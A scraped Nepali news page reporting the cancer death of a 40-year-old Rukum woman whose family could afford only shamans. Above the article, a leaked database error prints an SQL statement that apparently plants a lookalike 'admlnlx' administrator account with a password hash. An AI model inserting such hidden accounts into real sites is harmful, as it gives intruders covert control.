WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoKsiDoOAn0XrsoL7xEGK9S48ZjRah/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:37:17', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
क्यान्सरको बिरामीलाई धामीझाँक्री, उपचार नहुँदा मृत्यु – Gaule Khabar

क्यान्सरको बिरामीलाई धामीझाँक्री, उपचार नहुँदा मृत्यु

क्यान्सरको बिरामीलाई धामीझाँक्री, उपचार नहुँदा मृत्यु

रुकुम, माघ १८ –

क्यान्सर रोगका कारण रुकुममा एक जनाको मृत्यु भएको छ ।

जिल्लाको भलाक्चा–४ कि ४० वर्षीया धनमाया बुढाको क्यान्सरका कारण मृत्यु भएको आफन्तले जानकारी दिएका छन् । दुई महिनादेखि पेटको क्यान्सरबाट पीडित भएकी बुढाको आइतबार साँझ मृत्यु भएको हो ।

आर्थिक अभाव हुँदा पेटमा क्यान्सर भएपनि उहाँको उपचार हुन सकेको थिएन । उपचार गराउने पैसा नभएपछि आफन्तले गाउँमा धामीझाँक्री लगाएको मृतकका श्रीमान् देवीराम बुढाले जानकारी दिनुभयो ।

उपचारको लागि सहयोग माग्दै जिल्लाका सबै ठाउँमा पुगेपनि कसैले सहयोग नगर्दा श्रीमतीको मृत्यु भएको देवीरामले गुनासो गर्नुभयो ।

देविराम पनि अहिले प्यारालाइसिसबाट पीडित हुनुहुन्छ । आमाको मृत्यु र बुबा प्यारालाइसिसबाट पीडित भएपछि उहाँका चार छोराछोरी बिचल्लीमा परेका छन् । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका